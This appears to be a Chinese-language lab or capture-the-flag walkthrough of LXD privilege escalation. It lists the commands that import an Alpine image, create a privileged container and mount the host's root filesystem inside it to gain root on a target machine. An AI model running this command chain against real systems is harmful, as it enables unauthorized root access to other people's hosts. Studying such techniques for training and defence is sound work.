LXD 特權升級（LXD Privilege Escalation）指的是一種攻擊方法，其中攻擊者試圖通過某種方式提升他們在 LXD（Linux Container Daemon）中運行的容器的權限，以獲得對主機系統的更多控制權。

• 在自己的電腦，建立最新的 Alpine image
  git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
  
  

• 將使用 alpine-v3.13-x86_64-20210218_0139.tar.gz 映像檔
  

• 進入靶機中
  cd /tmp

• 將製作好的映像檔，透過 ssh 傳到靶機上。
  scp ./alpine-v3.13-x86_64-20210218_0139.tar.gz jason@192.168.2.10:/home/jason/alpine-v3.13-x86_64-20210218_0139.tar.gz

• 將 image 掛上，取別名為 myimage
  lxc image import alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage  //掛 image
  

• 作列舉，確認 image 有掛上去
  lxc image list 
  

• 這時候還沒有 root 權限
  id 
  

• 初始化 image。第一個yes，後面一直按預設的選項即可
  lxd init 

• 掛上image
  lxc init myimage ignite -c security.privileged=true 
  

• 在 LXD 容器配置中添加一個設備的命令，將容器(叫 ignite)的根，掛到靶機的 /mnt/root。
  lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
  

• 將 ignite 容器啟動
  lxc start ignite

• 進入容器的命令行環境。
  lxc exec ignite /bin/sh

• 即取得容器的 root 權限。

• id  
  

• 如此就可以用 容器的 root 權限到我們所掛載的 /mnt/root 靶機中暢通無阻找檔案了。

  cd /
  find -name flag.txt

• 參考：
  https://www.exploit-db.com/exploits/46978
  https://www.hackingarticles.in/lxd-privilege-escalation/